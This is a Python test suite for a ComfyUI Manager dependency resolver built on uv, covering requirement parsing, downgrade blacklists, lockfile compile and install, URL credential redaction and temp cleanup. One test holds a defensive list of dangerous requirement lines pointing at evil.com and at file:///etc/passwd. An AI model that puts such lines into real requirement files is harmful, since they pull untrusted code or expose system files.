        assert "https://download.pytorch.org/whl/cu121" in collected.extra_index_urls

    def test_no_index_url(self, tmp_path):
        # Plain specs leave the URL list empty.
        pack = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
        collected = _resolver([pack]).collect_requirements()
        assert collected.extra_index_urls == []

    def test_duplicate_index_urls_deduplicated(self, tmp_path):
        pack_a = _make_node_pack(
            str(tmp_path), "pack_a",
            "torch --index-url https://example.com/whl\n")
        pack_b = _make_node_pack(
            str(tmp_path), "pack_b",
            "torchvision --index-url https://example.com/whl\n")
        collected = _resolver([pack_a, pack_b], blacklist=set()).collect_requirements()
        assert len(collected.extra_index_urls) == 1

    def test_standalone_index_url_line(self, tmp_path):
        """Standalone ``--index-url URL`` line with no package prefix."""
        pack = _make_node_pack(
            str(tmp_path), "pack_a",
            "--index-url https://download.pytorch.org/whl/cu121\nnumpy>=1.20\n")
        collected = _resolver([pack]).collect_requirements()
        assert len(collected.requirements) == 1
        assert collected.requirements[0].name == "numpy"
        assert "https://download.pytorch.org/whl/cu121" in collected.extra_index_urls

    def test_standalone_extra_index_url_line(self, tmp_path):
        """Standalone ``--extra-index-url URL`` line must not become a package."""
        pack = _make_node_pack(
            str(tmp_path), "pack_a",
            "--extra-index-url https://custom.pypi.org/simple\nnumpy>=1.20\n")
        collected = _resolver([pack]).collect_requirements()
        assert len(collected.requirements) == 1
        assert collected.requirements[0].name == "numpy"
        assert "https://custom.pypi.org/simple" in collected.extra_index_urls

    def test_extra_index_url_with_package_prefix(self, tmp_path):
        """``package --extra-index-url URL`` splits correctly."""
        pack = _make_node_pack(
            str(tmp_path), "pack_a",
            "torch --extra-index-url https://download.pytorch.org/whl/cu121\n")
        collected = _resolver([pack]).collect_requirements()
        assert len(collected.requirements) == 1
        assert collected.requirements[0].name == "torch"
        assert "https://download.pytorch.org/whl/cu121" in collected.extra_index_urls
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Downgrade blacklist
|
||||
# ===========================================================================
|
||||
|
||||
class TestDowngradeBlacklist:
    """Blacklisted packages must never be downgraded below the installed version."""

    def setup_method(self):
        # Isolate each test from leftover fake installation state.
        _MOCK_INSTALLED_PACKAGES.clear()

    def teardown_method(self):
        _MOCK_INSTALLED_PACKAGES.clear()

    def test_not_in_blacklist_passes(self, tmp_path):
        # Downgrade protection only applies to blacklisted names.
        _MOCK_INSTALLED_PACKAGES["numpy"] = "1.24.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", "numpy<=1.20\n")
        resolver = _resolver([pack], downgrade_blacklist=["torch"])
        assert len(resolver.collect_requirements().requirements) == 1

    def test_no_version_spec_installed_blocked(self, tmp_path):
        # Bare "torch" would let uv pick any version, so it is blocked
        # when torch is already installed.
        _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", "torch\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        assert collected.requirements == []
        assert "downgrade blacklisted" in collected.skipped[0][1]

    def test_no_version_spec_not_installed_passes(self, tmp_path):
        # torch not installed
        pack = _make_node_pack(str(tmp_path), "pack_a", "torch\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        assert len(collected.requirements) == 1

    @pytest.mark.parametrize("operator,blocked", [
        ("<=1.20", True),   # downgrade blocked
        ("==1.20", True),   # exact match blocked (installed >= requested)
        ("<2.0", True),     # less-than blocked (installed >= requested)
        ("~=1.20", True),   # compatible release blocked
        (">=2.5", False),   # upgrade allowed
        (">2.0", False),    # greater-than allowed
        ("!=1.20", False),  # not-equal allowed
    ])
    def test_operator_handling(self, operator, blocked, tmp_path):
        _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", f"torch{operator}\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        if blocked:
            assert collected.requirements == [], f"Expected torch{operator} to be blocked"
        else:
            assert len(collected.requirements) == 1, f"Expected torch{operator} to pass"

    def test_same_version_blocked(self, tmp_path):
        _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", "torch==2.1.0\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        # installed >= requested → blocked
        assert collected.requirements == []

    def test_higher_version_request_passes_eq(self, tmp_path):
        _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", "torch==2.5.0\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        # installed < requested → allowed
        assert len(collected.requirements) == 1
||||
|
||||
|
||||
# ===========================================================================
|
||||
# _get_uv_cmd
|
||||
# ===========================================================================
|
||||
|
||||
class TestGetUvCmd:
    """Locating uv: prefer ``python -m uv``, fall back to a standalone binary,
    raise ``UvNotAvailableError`` when neither exists."""

    def test_module_uv(self):
        # ``python -m uv --version`` succeeding selects the module invocation.
        r = _resolver([])
        with mock.patch("subprocess.check_output", return_value=b"uv 0.4.0"):
            cmd = r._get_uv_cmd()
        assert cmd[-2:] == ["-m", "uv"]

    def test_standalone_uv(self):
        # Module form unavailable -> fall back to the ``uv`` binary on PATH.
        r = _resolver([])
        with mock.patch("subprocess.check_output", side_effect=FileNotFoundError):
            with mock.patch("shutil.which", return_value="/usr/bin/uv"):
                cmd = r._get_uv_cmd()
        assert cmd == ["uv"]

    def test_uv_not_available(self):
        # Neither form available -> caller must handle UvNotAvailableError.
        r = _resolver([])
        with mock.patch("subprocess.check_output", side_effect=FileNotFoundError):
            with mock.patch("shutil.which", return_value=None):
                with pytest.raises(UvNotAvailableError):
                    r._get_uv_cmd()

    def test_embedded_python_uses_s_flag(self):
        # Embedded-python builds (python_embeded) must pass ``-s`` so user
        # site-packages are skipped.  The previous version also wrapped
        # ``_get_uv_cmd`` with a ``mock.patch.object(..., wraps=...)`` patch
        # that delegated straight back to the original method; that patch
        # changed nothing observable and has been removed.
        r = _resolver([])
        with mock.patch("subprocess.check_output", return_value=b"uv 0.4.0"):
            # Simulate embedded python
            with mock.patch(
                "comfyui_manager.common.unified_dep_resolver.sys"
            ) as mock_sys:
                mock_sys.executable = "/path/python_embeded/python.exe"
                cmd = r._get_uv_cmd()
        assert "-s" in cmd
||||
|
||||
|
||||
# ===========================================================================
|
||||
# compile_lockfile
|
||||
# ===========================================================================
|
||||
|
||||
class TestCompileLockfile:
    """``compile_lockfile``: success, conflict, timeout, and flag wiring.

    The ``subprocess.run`` stand-in that simulates ``uv pip compile`` was
    previously copy-pasted into three tests; it is factored into
    ``_fake_uv_run`` below.
    """

    @staticmethod
    def _fake_uv_run(lockfile_content, captured_cmd=None):
        """Build a ``subprocess.run`` replacement simulating ``uv pip compile``.

        Writes *lockfile_content* to the path following ``--output-file`` and,
        when *captured_cmd* is given, records the full command line into it.
        Always reports exit code 0.
        """
        def fake_run(cmd, **kwargs):
            if captured_cmd is not None:
                captured_cmd.extend(cmd)
            for i, arg in enumerate(cmd):
                if arg == "--output-file" and i + 1 < len(cmd):
                    with open(cmd[i + 1], "w") as f:
                        f.write(lockfile_content)
            return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
        return fake_run

    def test_success(self, tmp_path):
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy>=1.20", "/pack/a")],
        )

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run",
                            side_effect=self._fake_uv_run("numpy==1.24.0\n")):
                result = r.compile_lockfile(deps)

        assert result.success
        assert result.lockfile_path is not None
        # Clean up the resolver's temp directory.
        shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)

    def test_conflict_detection(self):
        # A non-zero exit with a conflict message must surface in ``conflicts``.
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy>=1.20", "/pack/a")],
        )

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
                [], 1, stdout="", stderr="error: conflict between numpy and scipy"
            )):
                result = r.compile_lockfile(deps)

        assert not result.success
        assert len(result.conflicts) > 0

    def test_timeout(self):
        # A hung uv process is reported as a timeout, not an exception.
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
        )

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", side_effect=subprocess.TimeoutExpired("uv", 300)):
                result = r.compile_lockfile(deps)

        assert not result.success
        assert "timeout" in result.conflicts[0].lower()

    def test_lockfile_not_created(self):
        # Exit code 0 but no file written is still a failure.
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
        )

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
                [], 0, stdout="", stderr=""
            )):
                result = r.compile_lockfile(deps)

        assert not result.success
        assert "lockfile not created" in result.conflicts[0]

    def test_extra_index_urls_passed(self, tmp_path):
        # Collected extra index URLs must be forwarded on the uv command line.
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("torch", "torch", "/pack/a")],
            extra_index_urls=["https://download.pytorch.org/whl/cu121"],
        )

        captured_cmd: list[str] = []

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run",
                            side_effect=self._fake_uv_run("torch==2.1.0\n", captured_cmd)):
                result = r.compile_lockfile(deps)

        assert result.success
        assert "--extra-index-url" in captured_cmd
        assert "https://download.pytorch.org/whl/cu121" in captured_cmd
        shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)

    def test_constraints_file_created(self, tmp_path):
        # Base requirements become a --constraint file for uv.
        r = UnifiedDepResolver(
            node_pack_paths=[],
            base_requirements=["comfyui-core>=1.0"],
        )
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
        )

        captured_cmd: list[str] = []

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run",
                            side_effect=self._fake_uv_run("numpy==1.24.0\n", captured_cmd)):
                result = r.compile_lockfile(deps)

        assert result.success
        assert "--constraint" in captured_cmd
        shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)
||||
|
||||
|
||||
# ===========================================================================
|
||||
# install_from_lockfile
|
||||
# ===========================================================================
|
||||
|
||||
class TestInstallFromLockfile:
    """``install_from_lockfile`` behaviour: success, failure, timeout, atomicity."""

    @staticmethod
    def _write_lockfile(tmp_path, content):
        # Create a resolved.txt lockfile with *content* and return its path.
        path = os.path.join(str(tmp_path), "resolved.txt")
        with open(path, "w") as f:
            f.write(content)
        return path

    def test_success(self, tmp_path):
        lockfile = self._write_lockfile(tmp_path, "numpy==1.24.0\n")
        r = _resolver([])
        ok = subprocess.CompletedProcess(
            [], 0, stdout="Installed numpy-1.24.0\n", stderr="")
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", return_value=ok):
                result = r.install_from_lockfile(lockfile)
        assert result.success
        assert len(result.installed) == 1

    def test_failure(self, tmp_path):
        lockfile = self._write_lockfile(tmp_path, "nonexistent-pkg==1.0.0\n")
        r = _resolver([])
        failed = subprocess.CompletedProcess(
            [], 1, stdout="", stderr="No matching distribution found")
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", return_value=failed):
                result = r.install_from_lockfile(lockfile)
        assert not result.success
        assert result.stderr != ""

    def test_timeout(self, tmp_path):
        lockfile = self._write_lockfile(tmp_path, "numpy==1.24.0\n")
        r = _resolver([])
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run",
                            side_effect=subprocess.TimeoutExpired("uv", 600)):
                result = r.install_from_lockfile(lockfile)
        assert not result.success
        assert "TimeoutExpired" in result.stderr

    def test_atomic_failure_empty_installed(self, tmp_path):
        # On failure nothing may be reported as installed.
        lockfile = self._write_lockfile(tmp_path, "broken-pkg==1.0.0\n")
        r = _resolver([])
        failed = subprocess.CompletedProcess([], 1, stdout="", stderr="error")
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", return_value=failed):
                result = r.install_from_lockfile(lockfile)
        assert not result.success
        assert result.installed == []
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Credential redaction
|
||||
# ===========================================================================
|
||||
|
||||
class TestCredentialRedaction:
    """Credentials embedded in index URLs are masked before logging."""

    def test_redact_user_pass(self):
        resolver = _resolver([])
        url = "https://user:pass123@pypi.example.com/simple"
        redacted = resolver._redact_url(url)
        assert "user:pass123" not in redacted
        assert "****@" in redacted

    def test_no_credentials_passthrough(self):
        # URLs without credentials come back unchanged.
        resolver = _resolver([])
        url = "https://pypi.org/simple"
        assert resolver._redact_url(url) == url

    def test_redact_pattern(self):
        result = _CREDENTIAL_PATTERN.sub('://****@', "https://a:b@host")
        assert result == "https://****@host"
||||
|
||||
|
||||
# ===========================================================================
|
||||
# cleanup_stale_tmp
|
||||
# ===========================================================================
|
||||
|
||||
class TestCleanupStaleTmp:
    """Stale resolver temp directories are reaped; recent and foreign ones survive."""

    @staticmethod
    def _backdate(path, seconds):
        # Push a directory's atime/mtime *seconds* into the past.
        stamp = time.time() - seconds
        os.utime(path, (stamp, stamp))

    def test_removes_old_dirs(self, tmp_path):
        stale = os.path.join(str(tmp_path), f"{_TMP_PREFIX}old")
        os.makedirs(stale)
        self._backdate(stale, 7200)  # 2 hours ago

        with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
            UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)

        assert not os.path.exists(stale)

    def test_preserves_recent_dirs(self, tmp_path):
        recent = os.path.join(str(tmp_path), f"{_TMP_PREFIX}recent")
        os.makedirs(recent)

        with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
            UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)

        assert os.path.exists(recent)

    def test_ignores_non_prefix_dirs(self, tmp_path):
        # Old directories without the resolver prefix are not ours to delete.
        other = os.path.join(str(tmp_path), "other_dir")
        os.makedirs(other)
        self._backdate(other, 7200)

        with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
            UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)

        assert os.path.exists(other)
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Concurrency: unique temp directories
|
||||
# ===========================================================================
|
||||
|
||||
class TestConcurrency:
    """Concurrent compiles must not share scratch directories."""

    def test_unique_temp_directories(self):
        """Two resolver instances get unique temp dirs (via mkdtemp)."""
        # Directories created by mkdtemp, in call order.
        dirs: list[str] = []

        original_mkdtemp = tempfile.mkdtemp

        def capturing_mkdtemp(**kwargs):
            # Delegate to the real mkdtemp but record every directory created.
            d = original_mkdtemp(**kwargs)
            dirs.append(d)
            return d

        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy", "/p")],
        )

        def fake_run(cmd, **kwargs):
            # Simulate a successful ``uv pip compile``: write the lockfile to
            # the path following --output-file.
            for i, arg in enumerate(cmd):
                if arg == "--output-file" and i + 1 < len(cmd):
                    with open(cmd[i + 1], "w") as f:
                        f.write("numpy==1.24.0\n")
            return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")

        # Patch mkdtemp where the resolver module looks it up, not globally,
        # so only the resolver's calls are captured.
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", side_effect=fake_run):
                with mock.patch(
                    "comfyui_manager.common.unified_dep_resolver.tempfile.mkdtemp",
                    side_effect=capturing_mkdtemp,
                ):
                    r.compile_lockfile(deps)
                    r.compile_lockfile(deps)

        # Each compile must have created its own fresh directory.
        assert len(dirs) == 2
        assert dirs[0] != dirs[1]

        for d in dirs:
            shutil.rmtree(d, ignore_errors=True)
||||
|
||||
|
||||
# ===========================================================================
|
||||
# resolve_and_install (full pipeline)
|
||||
# ===========================================================================
|
||||
|
||||
class TestResolveAndInstall:
    """Full pipeline: collect requirements -> compile lockfile -> install."""

    def test_no_deps_returns_success(self, tmp_path):
        # Nothing to install is a trivially successful run.
        p = _make_node_pack(str(tmp_path), "pack_a")  # No requirements.txt
        r = _resolver([p])
        result = r.resolve_and_install()
        assert result.success

    def test_uv_not_available_raises(self, tmp_path):
        # With deps present but uv missing, the error propagates so the caller
        # can fall back to per-node pip install.
        p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
        r = _resolver([p])
        with mock.patch.object(r, "_get_uv_cmd", side_effect=UvNotAvailableError("no uv")):
            with pytest.raises(UvNotAvailableError):
                r.resolve_and_install()

    def test_compile_failure_returns_error(self, tmp_path):
        # A non-zero ``uv pip compile`` exit becomes an unsuccessful result
        # whose error names the compile stage.
        p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
        r = _resolver([p])

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
                [], 1, stdout="", stderr="conflict error"
            )):
                result = r.resolve_and_install()

        assert not result.success
        assert "compile failed" in result.error

    def test_full_success_pipeline(self, tmp_path):
        # Happy path: exactly one compile and one install subprocess call, and
        # the collected requirements are reported on the result.
        p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
        r = _resolver([p])

        call_count = {"compile": 0, "install": 0}

        def fake_run(cmd, **kwargs):
            # Dispatch on the uv subcommand: "compile" writes the lockfile
            # named by --output-file; "install" reports one installed package.
            cmd_str = " ".join(cmd)
            if "compile" in cmd_str:
                call_count["compile"] += 1
                for i, arg in enumerate(cmd):
                    if arg == "--output-file" and i + 1 < len(cmd):
                        with open(cmd[i + 1], "w") as f:
                            f.write("numpy==1.24.0\n")
                return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
            elif "install" in cmd_str:
                call_count["install"] += 1
                return subprocess.CompletedProcess(
                    cmd, 0, stdout="Installed numpy-1.24.0\n", stderr=""
                )
            return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")

        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", side_effect=fake_run):
                result = r.resolve_and_install()

        assert result.success
        assert call_count["compile"] == 1
        assert call_count["install"] == 1
        assert result.collected is not None
        assert len(result.collected.requirements) == 1
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Multiple custom_nodes paths
|
||||
# ===========================================================================
|
||||
|
||||
class TestMultiplePaths:
    """Requirements are gathered from packs across several custom_nodes roots."""

    def test_collection_from_multiple_paths(self, tmp_path):
        root_a = os.path.join(str(tmp_path), "custom_nodes_a")
        root_b = os.path.join(str(tmp_path), "custom_nodes_b")
        pack_1 = _make_node_pack(root_a, "pack_1", "numpy\n")
        pack_2 = _make_node_pack(root_b, "pack_2", "requests\n")
        collected = _resolver([pack_1, pack_2]).collect_requirements()
        assert {req.name for req in collected.requirements} == {"numpy", "requests"}
||||
|
||||
|
||||
# ===========================================================================
|
||||
# cm_global defensive access
|
||||
# ===========================================================================
|
||||
|
||||
class TestDefensiveAccess:
    """Constructor defaults: omitted or ``None`` config maps to empty containers."""

    def test_default_blacklist_is_empty_set(self):
        assert UnifiedDepResolver(node_pack_paths=[]).blacklist == set()

    def test_default_overrides_is_empty_dict(self):
        assert UnifiedDepResolver(node_pack_paths=[]).overrides == {}

    def test_default_downgrade_blacklist_is_empty_list(self):
        assert UnifiedDepResolver(node_pack_paths=[]).downgrade_blacklist == []

    def test_explicit_none_uses_defaults(self):
        # Passing None explicitly behaves exactly like omitting the arguments.
        resolver = UnifiedDepResolver(
            node_pack_paths=[],
            blacklist=None,
            overrides=None,
            downgrade_blacklist=None,
        )
        assert resolver.blacklist == set()
        assert resolver.overrides == {}
        assert resolver.downgrade_blacklist == []
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Regex patterns
|
||||
# ===========================================================================
|
||||
|
||||
class TestPatterns:
    """Module-level regexes for dangerous lines and version specifiers."""

    def test_dangerous_pattern_matches(self):
        dangerous_lines = (
            "-r secret.txt",
            "--requirement secret.txt",
            "-e git+https://evil.com",
            "--editable ./local",
            "-c constraints.txt",
            "--find-links http://evil.com",
            "-f http://evil.com",
            "pkg @ file:///etc/passwd",
        )
        for line in dangerous_lines:
            assert _DANGEROUS_PATTERNS.match(line)

    def test_dangerous_pattern_no_false_positive(self):
        # Ordinary specs and index-url lines are not dangerous.
        for line in ("numpy>=1.20", "requests", "torch --index-url https://x.com"):
            assert _DANGEROUS_PATTERNS.match(line) is None

    def test_version_spec_pattern(self):
        match = _VERSION_SPEC_PATTERN.search("torch>=2.0")
        assert match is not None
        # Groups: (name, operator, version).
        assert match.group(1) == "torch"
        assert match.group(2) == ">="
        assert match.group(3) == "2.0"

    def test_version_spec_no_version(self):
        assert _VERSION_SPEC_PATTERN.search("torch") is None
||||
|
||||
|
||||
# ===========================================================================
|
||||
# _extract_package_name
|
||||
# ===========================================================================
|
||||
|
||||
class TestExtractPackageName:
    """``_extract_package_name``: strip versions/extras/URLs, normalise the name."""

    def test_simple_name(self):
        extract = UnifiedDepResolver._extract_package_name
        assert extract("numpy") == "numpy"

    def test_with_version(self):
        extract = UnifiedDepResolver._extract_package_name
        assert extract("numpy>=1.20") == "numpy"

    def test_normalisation(self):
        # Upper-case letters and hyphens normalise to lower-case underscores.
        extract = UnifiedDepResolver._extract_package_name
        assert extract("My-Package>=1.0") == "my_package"

    def test_extras(self):
        extract = UnifiedDepResolver._extract_package_name
        assert extract("requests[security]") == "requests"

    def test_at_url(self):
        extract = UnifiedDepResolver._extract_package_name
        assert extract("pkg @ https://example.com/pkg.tar.gz") == "pkg"
||||
|
||||
|
||||
# ===========================================================================
|
||||
# _is_disabled_path
|
||||
# ===========================================================================
|
||||
|
||||
class TestIsDisabledPath:
    """Both disabled-pack conventions are recognised: ``.disabled/`` parent
    directory (new style) and ``.disabled`` name suffix (old style)."""

    def test_new_style(self):
        is_disabled = UnifiedDepResolver._is_disabled_path
        assert is_disabled("/custom_nodes/.disabled/my_pack")

    def test_old_style(self):
        is_disabled = UnifiedDepResolver._is_disabled_path
        assert is_disabled("/custom_nodes/my_pack.disabled")

    def test_normal_path(self):
        is_disabled = UnifiedDepResolver._is_disabled_path
        assert not is_disabled("/custom_nodes/my_pack")

    def test_trailing_slash(self):
        # A trailing slash must not hide the .disabled suffix.
        is_disabled = UnifiedDepResolver._is_disabled_path
        assert is_disabled("/custom_nodes/my_pack.disabled/")
||||
|
||||
|
||||
# ===========================================================================
|
||||
# collect_node_pack_paths
|
||||
# ===========================================================================
|
||||
|
||||
class TestCollectNodePackPaths:
    """Enumerating node-pack directories under one or more custom_nodes roots."""

    def test_collects_subdirectories(self, tmp_path):
        base = tmp_path / "custom_nodes"
        base.mkdir()
        for name in ("pack_a", "pack_b"):
            (base / name).mkdir()
        (base / "file.txt").touch()  # plain files are not node packs
        found = collect_node_pack_paths([str(base)])
        assert sorted(os.path.basename(p) for p in found) == ["pack_a", "pack_b"]

    def test_nonexistent_base_dir(self):
        assert collect_node_pack_paths(["/nonexistent/path"]) == []

    def test_multiple_base_dirs(self, tmp_path):
        first = tmp_path / "cn1"
        second = tmp_path / "cn2"
        first.mkdir()
        second.mkdir()
        (first / "pack_a").mkdir()
        (second / "pack_b").mkdir()
        found = collect_node_pack_paths([str(first), str(second)])
        assert sorted(os.path.basename(p) for p in found) == ["pack_a", "pack_b"]

    def test_empty_base_dir(self, tmp_path):
        base = tmp_path / "custom_nodes"
        base.mkdir()
        assert collect_node_pack_paths([str(base)]) == []
||||
|
||||
|
||||
# ===========================================================================
|
||||
# collect_base_requirements
|
||||
# ===========================================================================
|
||||
|
||||
class TestCollectBaseRequirements:
    """Reading ComfyUI base requirement files used as resolution constraints."""

    def test_reads_both_files(self, tmp_path):
        (tmp_path / "requirements.txt").write_text("numpy>=1.20\n")
        (tmp_path / "manager_requirements.txt").write_text("requests\n")
        assert collect_base_requirements(str(tmp_path)) == ["numpy>=1.20", "requests"]

    def test_skips_comments_and_blanks(self, tmp_path):
        # Comment lines, empty lines, and whitespace-only lines are ignored.
        (tmp_path / "requirements.txt").write_text("# comment\n\nnumpy\n \n")
        assert collect_base_requirements(str(tmp_path)) == ["numpy"]

    def test_missing_files(self, tmp_path):
        assert collect_base_requirements(str(tmp_path)) == []

    def test_only_requirements_txt(self, tmp_path):
        (tmp_path / "requirements.txt").write_text("torch\n")
        assert collect_base_requirements(str(tmp_path)) == ["torch"]
Loading…
Reference in New Issue
Block a user